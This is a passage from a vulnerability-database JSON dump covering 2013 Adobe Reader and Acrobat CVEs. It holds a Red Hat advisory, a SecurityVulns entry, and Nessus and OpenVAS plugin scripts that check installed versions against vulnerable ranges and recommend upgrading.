);\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201308-03\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Adobe Reader users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-text/acroread-9.5.5'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/08/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-text/acroread\", unaffected:make_list(\"ge 9.5.5\"), vulnerable:make_list(\"lt 9.5.5\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Adobe Reader\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:52", "bulletinFamily": "software", "description": "Multiple memory corruptions, code execution, privilege escalation.", "modified": "2013-07-15T00:00:00", "published": "2013-07-15T00:00:00", "id": "SECURITYVULNS:VULN:13174", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13174", "title": "Adobe Acrobat / Reader multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2018-12-11T19:43:21", "bulletinFamily": "unix", "description": "Adobe Reader allows users to view and print documents in Portable Document\nFormat (PDF).\n\nThis update fixes multiple security flaws in Adobe Reader. These flaws are\ndetailed in the Adobe Security bulletin APSB13-15, listed in the References\nsection. A specially-crafted PDF file could cause Adobe Reader to crash or,\npotentially, execute arbitrary code as the user running Adobe Reader when\nopened. (CVE-2013-2549, CVE-2013-2718, CVE-2013-2719, CVE-2013-2720,\nCVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2724, CVE-2013-2725,\nCVE-2013-2726, CVE-2013-2727, CVE-2013-2729, CVE-2013-2730, CVE-2013-2731,\nCVE-2013-2732, CVE-2013-2733, CVE-2013-2734, CVE-2013-2735, CVE-2013-2736,\nCVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, CVE-2013-3341)\n\nThis update also fixes an information leak flaw in Adobe Reader.\n(CVE-2013-2737)\n\nAll Adobe Reader users should install these updated packages. They contain\nAdobe Reader version 9.5.5, which is not vulnerable to these issues. All\nrunning instances of Adobe Reader must be restarted for the update to take\neffect.\n", "modified": "2018-06-07T09:04:28", "published": "2013-05-15T04:00:00", "id": "RHSA-2013:0826", "href": "https://access.redhat.com/errata/RHSA-2013:0826", "type": "redhat", "title": "(RHSA-2013:0826) Critical: acroread security update", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-10-22T16:42:21", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Acrobat and is prone to multiple unspecified\nvulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2013-05-28T00:00:00", "id": "OPENVAS:1361412562310803616", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803616", "title": "Adobe Acrobat Multiple Unspecified Vulnerabilities -01 May13 (Windows)", "type": "openvas", "sourceData": "#############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_acrobat_mult_unspecified_vuln01_may13_win.nasl 29729 2013-05-28 10:47:39Z may$\n#\n# Adobe Acrobat Multiple Unspecified Vulnerabilities -01 May13 (Windows)\n#\n# Authors:\n# Arun Kallavi <karun@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803616\");\n script_version(\"$Revision: 11865 $\");\n script_cve_id(\"CVE-2013-3342\", \"CVE-2013-3341\", \"CVE-2013-3340\", \"CVE-2013-3339\",\n \"CVE-2013-3338\", \"CVE-2013-3337\", \"CVE-2013-2737\", \"CVE-2013-2736\",\n \"CVE-2013-2735\", \"CVE-2013-2734\", \"CVE-2013-2733\", \"CVE-2013-2732\",\n \"CVE-2013-2731\", \"CVE-2013-2730\", \"CVE-2013-2729\", \"CVE-2013-2727\",\n \"CVE-2013-2726\", \"CVE-2013-2725\", \"CVE-2013-2724\", \"CVE-2013-2723\",\n \"CVE-2013-2722\", \"CVE-2013-2721\", \"CVE-2013-2720\", \"CVE-2013-2719\",\n \"CVE-2013-2718\", \"CVE-2013-3346\");\n script_bugtraq_id(59930, 59911, 59917, 59906, 59916, 59914, 59926, 59908, 59910,\n 59905, 59925, 59904, 59921, 59923, 59918, 59903, 59920, 59919,\n 59927, 59915, 59913, 59912, 59909, 59907, 59902);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-05-28 10:47:39 +0530 (Tue, 28 May 2013)\");\n script_name(\"Adobe Acrobat Multiple Unspecified Vulnerabilities -01 May13 (Windows)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Acrobat and is prone to multiple unspecified\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"solution\", value:\"Update to Adobe Acrobat Version 11.0.03 or 10.1.7 or 9.5.5 or later.\");\n script_tag(name:\"insight\", value:\"For more information about the vulnerabilities refer the reference links.\");\n script_tag(name:\"affected\", value:\"Adobe Acrobat Version 9.x prior to 9.5.5 on Windows\nAdobe Acrobat Version 10.x prior to 10.1.7 on Windows\nAdobe Acrobat Version 11.x prior to 11.0.03 on Windows\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary code,\ncorrupt memory, obtain sensitive information, bypass certain security\nrestrictions or cause a denial of service condition.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/53420\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb13-15.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Acrobat/Win/Installed\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/in/products/acrobat.html\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!acrobatVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(acrobatVer && acrobatVer =~ \"^9|10|11\")\n{\n if((version_in_range(version:acrobatVer, test_version:\"9.0\", test_version2: \"9.5.4\"))||\n (version_in_range(version:acrobatVer, test_version:\"10.0\", test_version2: \"10.1.6\"))||\n (version_in_range(version:acrobatVer, test_version:\"11.0\", test_version2: \"11.0.02\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-22T16:42:19", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Acrobat and is prone to multiple unspecified\nvulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2013-05-28T00:00:00", "id": "OPENVAS:1361412562310803617", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803617", "title": "Adobe Acrobat Multiple Unspecified Vulnerabilities -01 May13 (Mac OS X)", "type": "openvas", "sourceData": "#############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_acrobat_mult_unspecified_vuln01_may13_macosx.nasl 29729 2013-05-28 10:51:02Z may$\n#\n# Adobe Acrobat Multiple Unspecified Vulnerabilities -01 May13 (Mac OS X)\n#\n# Authors:\n# Arun Kallavi <karun@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803617\");\n script_version(\"$Revision: 11865 $\");\n script_cve_id(\"CVE-2013-3342\", \"CVE-2013-3341\", \"CVE-2013-3340\", \"CVE-2013-3339\",\n \"CVE-2013-3338\", \"CVE-2013-3337\", \"CVE-2013-2737\", \"CVE-2013-2736\",\n \"CVE-2013-2735\", \"CVE-2013-2734\", \"CVE-2013-2733\", \"CVE-2013-2732\",\n \"CVE-2013-2731\", \"CVE-2013-2730\", \"CVE-2013-2729\", \"CVE-2013-2727\",\n \"CVE-2013-2726\", \"CVE-2013-2725\", \"CVE-2013-2724\", \"CVE-2013-2723\",\n \"CVE-2013-2722\", \"CVE-2013-2721\", \"CVE-2013-2720\", \"CVE-2013-2719\",\n \"CVE-2013-2718\", \"CVE-2013-3346\");\n script_bugtraq_id(59930, 59911, 59917, 59906, 59916, 59914, 59926, 59908, 59910,\n 59905, 59925, 59904, 59921, 59923, 59918, 59903, 59920, 59919,\n 59927, 59915, 59913, 59912, 59909, 59907, 59902);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-05-28 10:51:02 +0530 (Tue, 28 May 2013)\");\n script_name(\"Adobe Acrobat Multiple Unspecified Vulnerabilities -01 May13 (Mac OS X)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Acrobat and is prone to multiple unspecified\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"solution\", value:\"Update to Adobe Acrobat Version 11.0.03 or 10.1.7 or 9.5.5 or later.\");\n script_tag(name:\"insight\", value:\"For more information about the vulnerabilities refer the reference links.\");\n script_tag(name:\"affected\", value:\"Adobe Acrobat Version 9.x prior to 9.5.5 on Mac OS X\nAdobe Acrobat Version 10.x prior to 10.1.7 on Mac OS X\nAdobe Acrobat Version 11.x prior to 11.0.03 on Mac OS X\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary code,\ncorrupt memory, obtain sensitive information, bypass certain security\nrestrictions or cause a denial of service condition.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/53420\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb13-15.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Acrobat/MacOSX/Version\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/in/products/acrobat.html\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!acrobatVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(acrobatVer && acrobatVer =~ \"^9|10|11\")\n{\n if((version_in_range(version:acrobatVer, test_version:\"9.0\", test_version2: \"9.5.4\"))||\n (version_in_range(version:acrobatVer, test_version:\"10.0\", test_version2: \"10.1.6\"))||\n (version_in_range(version:acrobatVer, test_version:\"11.0\", test_version2: \"11.0.02\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-22T16:42:19", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Reader and is prone to multiple unspecified\nvulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2013-05-28T00:00:00", "id": "OPENVAS:1361412562310803614", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803614", "title": "Adobe Reader Multiple Unspecified Vulnerabilities -01 May13 (Mac OS X)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_reader_mult_unspecified_vuln01_may13_macosx.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# Adobe Reader Multiple Unspecified Vulnerabilities -01 May13 (Mac OS X)\n#\n# Authors:\n# Arun Kallavi <karun@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803614\");\n script_version(\"$Revision: 11865 $\");\n script_cve_id(\"CVE-2013-3342\", \"CVE-2013-3341\", \"CVE-2013-3340\", \"CVE-2013-3339\",\n \"CVE-2013-3338\", \"CVE-2013-3337\", \"CVE-2013-2737\", \"CVE-2013-2736\",\n \"CVE-2013-2735\", \"CVE-2013-2734\", \"CVE-2013-2733\", \"CVE-2013-2732\",\n \"CVE-2013-2731\", \"CVE-2013-2730\", \"CVE-2013-2729\", \"CVE-2013-2727\",\n \"CVE-2013-2726\", \"CVE-2013-2725\", \"CVE-2013-2724\", \"CVE-2013-2723\",\n \"CVE-2013-2722\", \"CVE-2013-2721\", \"CVE-2013-2720\", \"CVE-2013-2719\",\n \"CVE-2013-2718\", \"CVE-2013-3346\", \"CVE-2013-2549\", \"CVE-2013-2550\");\n script_bugtraq_id(59930, 59911, 59917, 59906, 59916, 59914, 59926, 59908, 59910,\n 59905, 59925, 59904, 59921, 59923, 59918, 59903, 59920, 59919,\n 59927, 59915, 59913, 59912, 59909, 59907, 59902, 58398, 58568);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-05-28 10:15:11 +0530 (Tue, 28 May 2013)\");\n script_name(\"Adobe Reader Multiple Unspecified Vulnerabilities -01 May13 (Mac OS X)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader and is prone to multiple unspecified\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"For more information about the vulnerabilities refer the reference links.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary code,\ncorrupt memory, obtain sensitive information, bypass certain security\nrestrictions or cause a denial of service condition.\");\n script_tag(name:\"affected\", value:\"Adobe Reader Version 9.x prior to 9.5.5 on Mac OS X\nAdobe Reader X Version 10.x prior to 10.1.7 on Mac OS X\nAdobe Reader XI Version 11.x prior to 11.0.03 on Mac OS X\");\n script_tag(name:\"solution\", value:\"Update to Adobe Reader Version 11.0.03 or 10.1.7 or 9.5.5 or later.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/53420\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb13-15.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Reader/MacOSX/Version\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/reader\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!readerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(readerVer =~ \"^9|10|11\")\n{\n if((version_in_range(version:readerVer, test_version:\"9.0\", test_version2: \"9.5.4\"))||\n (version_in_range(version:readerVer, test_version:\"10.0\", test_version2: \"10.1.6\"))||\n (version_in_range(version:readerVer, test_version:\"11.0\", test_version2: \"11.0.02\")))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-22T16:41:52", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Reader and is prone to multiple unspecified\nvulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2013-05-28T00:00:00", "id": "OPENVAS:1361412562310803615", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803615", "title": "Adobe Reader Multiple Unspecified Vulnerabilities -01 May13 (Linux)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_reader_mult_unspecified_vuln01_may13_lin.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# Adobe Reader Multiple Unspecified Vulnerabilities -01 May13 (Linux)\n#\n# Authors:\n# Arun Kallavi <karun@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803615\");\n script_version(\"$Revision: 11865 $\");\n script_cve_id(\"CVE-2013-3342\", \"CVE-2013-3341\", \"CVE-2013-3340\", \"CVE-2013-3339\",\n \"CVE-2013-3338\", \"CVE-2013-3337\", \"CVE-2013-2737\", \"CVE-2013-2736\",\n \"CVE-2013-2735\", \"CVE-2013-2734\", \"CVE-2013-2733\", \"CVE-2013-2732\",\n \"CVE-2013-2731\", \"CVE-2013-2730\", \"CVE-2013-2729\", \"CVE-2013-2727\",\n \"CVE-2013-2726\", \"CVE-2013-2725\", \"CVE-2013-2724\", \"CVE-2013-2723\",\n \"CVE-2013-2722\", \"CVE-2013-2721\", \"CVE-2013-2720\", \"CVE-2013-2719\",\n \"CVE-2013-2718\", \"CVE-2013-3346\", \"CVE-2013-2549\", \"CVE-2013-2550\");\n script_bugtraq_id(59930, 59911, 59917, 59906, 59916, 59914, 59926, 59908, 59910,\n 59905, 59925, 59904, 59921, 59923, 59918, 59903, 59920, 59919,\n 59927, 59915, 59913, 59912, 59909, 59907, 59902, 58398, 58568);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-05-28 09:55:39 +0530 (Tue, 28 May 2013)\");\n script_name(\"Adobe Reader Multiple Unspecified Vulnerabilities -01 May13 (Linux)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader and is prone to multiple unspecified\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"For more information about the vulnerabilities refer the reference links.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary code,\ncorrupt memory, obtain sensitive information, bypass certain security\nrestrictions or cause a denial of service condition.\");\n script_tag(name:\"affected\", value:\"Adobe Reader Version 9.x prior to 9.5.5 on Linux\");\n script_tag(name:\"solution\", value:\"Update to Adobe Reader Version 9.5.5 or later.\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/53420\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb13-15.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_prdts_detect_lin.nasl\");\n script_mandatory_keys(\"Adobe/Reader/Linux/Version\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/reader\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!readerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(readerVer =~ \"^9\")\n{\n if(version_in_range(version:readerVer, test_version:\"9.0\", test_version2: \"9.5.4\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-22T16:42:02", "bulletinFamily": "scanner", "description": "This host is installed with Adobe Reader and is prone to multiple unspecified\nvulnerabilities.", "modified": "2018-10-12T00:00:00", "published": "2013-05-28T00:00:00", "id": "OPENVAS:1361412562310803613", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803613", "title": "Adobe Reader Multiple Unspecified Vulnerabilities -01 May13 (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_reader_mult_unspecified_vuln01_may13_win.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# Adobe Reader Multiple Unspecified Vulnerabilities -01 May13 (Windows)\n#\n# Authors:\n# Arun Kallavi <karun@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803613\");\n script_version(\"$Revision: 11865 $\");\n script_cve_id(\"CVE-2013-3342\", \"CVE-2013-3341\", \"CVE-2013-3340\", \"CVE-2013-3339\",\n \"CVE-2013-3338\", \"CVE-2013-3337\", \"CVE-2013-2737\", \"CVE-2013-2736\",\n \"CVE-2013-2735\", \"CVE-2013-2734\", \"CVE-2013-2733\", \"CVE-2013-2732\",\n \"CVE-2013-2731\", \"CVE-2013-2730\", \"CVE-2013-2729\", \"CVE-2013-2727\",\n \"CVE-2013-2726\", \"CVE-2013-2725\", \"CVE-2013-2724\", \"CVE-2013-2723\",\n \"CVE-2013-2722\", \"CVE-2013-2721\", \"CVE-2013-2720\", \"CVE-2013-2719\",\n \"CVE-2013-2718\", \"CVE-2013-3346\", \"CVE-2013-2549\", \"CVE-2013-2550\");\n script_bugtraq_id(59930, 59911, 59917, 59906, 59916, 59914, 59926, 59908, 59910,\n 59905, 59925, 59904, 59921, 59923, 59918, 59903, 59920, 59919,\n 59927, 59915, 59913, 59912, 59909, 59907, 59902, 58398, 58568);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-05-28 09:32:40 +0530 (Tue, 28 May 2013)\");\n script_name(\"Adobe Reader Multiple Unspecified Vulnerabilities -01 May13 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader and is prone to multiple unspecified\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"For more information about the vulnerabilities refer the reference links.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary code,\ncorrupt memory, obtain sensitive information, bypass certain security\nrestrictions or cause a denial of service condition.\");\n script_tag(name:\"affected\", value:\"Adobe Reader Version 9.x prior to 9.5.5 on Windows\n\nAdobe Reader X Version 10.x prior to 10.1.7 on Windows\n\nAdobe Reader XI Version 11.x prior to 11.0.03 on Windows\");\n script_tag(name:\"solution\", value:\"Update to Adobe Reader Version 11.0.03 or 10.1.7 or 9.5.5 or later.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/53420\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb13-15.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Reader/Win/Installed\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/reader\");\n 